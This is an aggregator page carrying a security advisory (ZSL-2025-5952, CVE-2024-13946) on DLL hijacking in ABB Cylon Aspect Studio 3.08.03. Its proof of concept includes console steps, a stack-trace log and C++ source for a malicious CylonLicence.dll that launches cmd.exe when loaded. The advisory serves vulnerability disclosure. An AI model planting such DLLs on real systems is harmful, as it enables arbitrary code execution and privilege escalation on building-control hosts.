ABB Cylon Aspect Studio 3.08.03 (CylonLicence.dll) Binary Planting

🗓️ 22 May 2025 00:00:00Reported by Gjoko KrsticType

zeroscience🔗 www.zeroscience.mk👁 257 Views

DLL hijacking in ABB Cylon Aspect Studio 3.08.03 allows arbitrary code execution and privilege escalation.

Reporter	Title	Published	Views	Family All 12
Circl	CVE-2024-13946	26 May 202521:02	–	circl
CNNVD	ABB多款产品代码问题漏洞	22 May 202500:00	–	cnnvd
CNVD	Various ABB products code issues vulnerabilities	17 Jun 202500:00	–	cnvd
CVE	CVE-2024-13946	22 May 202518:09	–	cve
Cvelist	CVE-2024-13946 Binary Planting / LoadLibrary DLL's not Signed	22 May 202518:09	–	cvelist
Exploit DB	ABB Cylon Aspect Studio 3.08.03 - Binary Planting	25 May 202500:00	–	exploitdb
EUVD	EUVD-2024-54598	3 Oct 202520:07	–	euvd
NVD	CVE-2024-13946	22 May 202519:15	–	nvd
Packet Storm	📄 ABB Cylon Aspect Studio 3.08.03 CylonLicence.dll Binary Planting	23 May 202500:00	–	packetstorm
Positive Technologies	PT-2025-22533 · Unknown · Nexus Series +2	22 May 202500:00	–	ptsecurity

<html><body><p>ABB Cylon Aspect Studio 3.08.03 (CylonLicence.dll) Binary Planting


Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: &lt;=3.08.03

Summary: ABB Cylon ASPECT Studio is a graphical programming tool and
integrated development environment (IDE) for ABB Cylon ASPECT products.
It's used to engineer comprehensive area control and graphical user interface
(GUI) solutions, containing a library of logical and graphical widgets.
It allows users to monitor and control facilities from anywhere, providing
insights into building performance and enabling timely reactions to issues.

Desc: A DLL hijacking vulnerability exists in Aspect-Studio version 3.08.03,
where the application attempts to load a library named CylonLicence via
System.loadLibrary("CylonLicence") without a full path, falling back to the
standard library search order. If an attacker can plant a malicious CylonLicence.dll
in a writable directory that is searched before the legitimate library path,
this DLL will be loaded and executed with the privileges of the user running
the application. This flaw enables arbitrary code execution and can be exploited
for privilege escalation or persistence, especially in environments where the
application is executed by privileged users.

Tested on: Microsoft Windows 10 Home (EN)
           OpenJDK 64-Bit Server VM Temurin-21.0.6+7


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2025-5952
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5952.php

CVE ID: CVE-2024-13946
CVE URL: https://www.cve.org/CVERecord/SearchResults?query=CVE-2024-13946


21.04.2024

--


C:\&gt; type project

                 P   R   O   J   E   C   T

                        .|
                        | |
                        |'|            ._____
                ___    |  |            |.   |' .---"|
        _    .-'   '-. |  |     .--'|  ||   | _|    |
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |
     |' | |.    |    ||       | |   |  |    ||      |
 ____|  '-'     '    ""       '-'   '-.'    '`      |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                            
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ 
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ 
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               
                                                                                                               

C:\Aspect\Aspect-Studio-3.08.03&gt; del CylonLicence.dll
C:\Aspect\Aspect-Studio-3.08.03&gt; type aspect.bat
REM 64bit parameters
jre\bin\javaw -Dormlite.networkpoint.load=true -Dfile.encoding="UTF-8" -DlookAndFeel=nimbus -DMapGraphic.forceLoad=0 -DBACnet.discovery.driverPort=4224 -DBACnet.discovery.debugLevel=0 -Djava.library.path=. -DportPool.maxPortWaitTime=10000 -DOverride.enabled=false -Dlog4j.configuration=./log4j.aspectstudio.properties -Dswing.noxp=true -Dsun.java2d.d3d=false -Dsun.java2d.noddraw=true -XX:+UseG1GC -XX:MaxGCPauseMillis=200 -XX:InitiatingHeapOccupancyPercent=25 -Xss256k -Xms1024m -Xmx4096m -jar AspectStudioObf.jar

C:\Aspect\Aspect-Studio-3.08.03-a09&gt;aspect.bat

C:\Aspect\Aspect-Studio-3.08.03-a09&gt;REM 64bit parameters

C:\Aspect\Aspect-Studio-3.08.03-a09&gt;jre\bin\javaw -Dormlite.networkpoint.load=true -Dfile.encoding="UTF-8" -DlookAndFeel=nimbus -DMapGraphic.forceLoad=0 -DBACnet.discovery.driverPort=4224 -DBACnet.discovery.debugLevel=0 -Djava.library.path=. -DportPool.maxPortWaitTime=10000 -DOverride.enabled=false -Dlog4j.configuration=./log4j.aspectstudio.properties -Dswing.noxp=true -Dsun.java2d.d3d=false -Dsun.java2d.noddraw=true -XX:+UseG1GC -XX:MaxGCPauseMillis=200 -XX:InitiatingHeapOccupancyPercent=25 -Xss256k -Xms1024m -Xmx4096m -jar AspectStudioObf.jar


C:\Aspect\Aspect-Studio-3.08.03&gt; type AspectStudio.class
...
...
System.loadLibrary("CylonLicence");
} catch (Throwable t) {}
LoggerUtil.logger.error("Error loading license DLL", t);
}
}
...
...

C:\Aspect\Aspect-Studio-3.08.03&gt; cd logs
C:\Aspect\Aspect-Studio-3.08.03\logs&gt;type AspectStudio.log

ERROR: 2025-01-16 16:47:58,579 Error loading license DLL [main]
java.lang.UnsatisfiedLinkError: no CylonLicence in java.library.path
  at java.lang.ClassLoader.loadLibrary(ClassLoader.java:1867)
  at java.lang.Runtime.loadLibrary0(Runtime.java:870)
  at java.lang.System.loadLibrary(System.java:1122)
  at com.aamatrix.util.AspectStudio.<clinit>(AspectStudio.java:42)
  at com.aamatrix.vib.rrobin.CylonLicense.<init>(CylonLicense.java:18)
  at com.aamatrix.vib.rrobin.LicenseService.<init>(LicenseService.java:38)
  at com.aamatrix.vib.rrobin.LicenseService.<clinit>(LicenseService.java:34)
  at com.aamatrix.projectmanager.AspectStudio.<clinit>(AspectStudio.java:52)
  at java.lang.Class.forName0(Native Method)
  at java.lang.Class.forName(Class.java:348)
  at com.aamatrix.projectmanager.AspectStudioLauncher.main(AspectStudioLauncher.java:70)
  ...
  ...

C:\DLL-Mala&gt; type CylonLicence.cpp

#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <shellapi.h>


extern "C" __declspec(dllexport)
DWORD WINAPI ExecuteCmdThread(LPVOID lpParam) {
    ShellExecuteW(NULL, L"open", L"cmd.exe", L"/c start", NULL, SW_SHOWNORMAL);
    return 0;
}

extern "C" __declspec(dllexport)
BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD ul_reason_for_call,
    LPVOID lpReserved) {
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
        CreateThread(NULL, 0, ExecuteCmdThread, NULL, 0, NULL);
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
</shellapi.h></windows.h></clinit></clinit></init></init></clinit></p></body></html>

22 May 2025 00:00Current

6.3Medium risk

Vulners AI Score6.3

CVSS 3.16.8

CVSS 47.1

EPSS0.01113

SSVC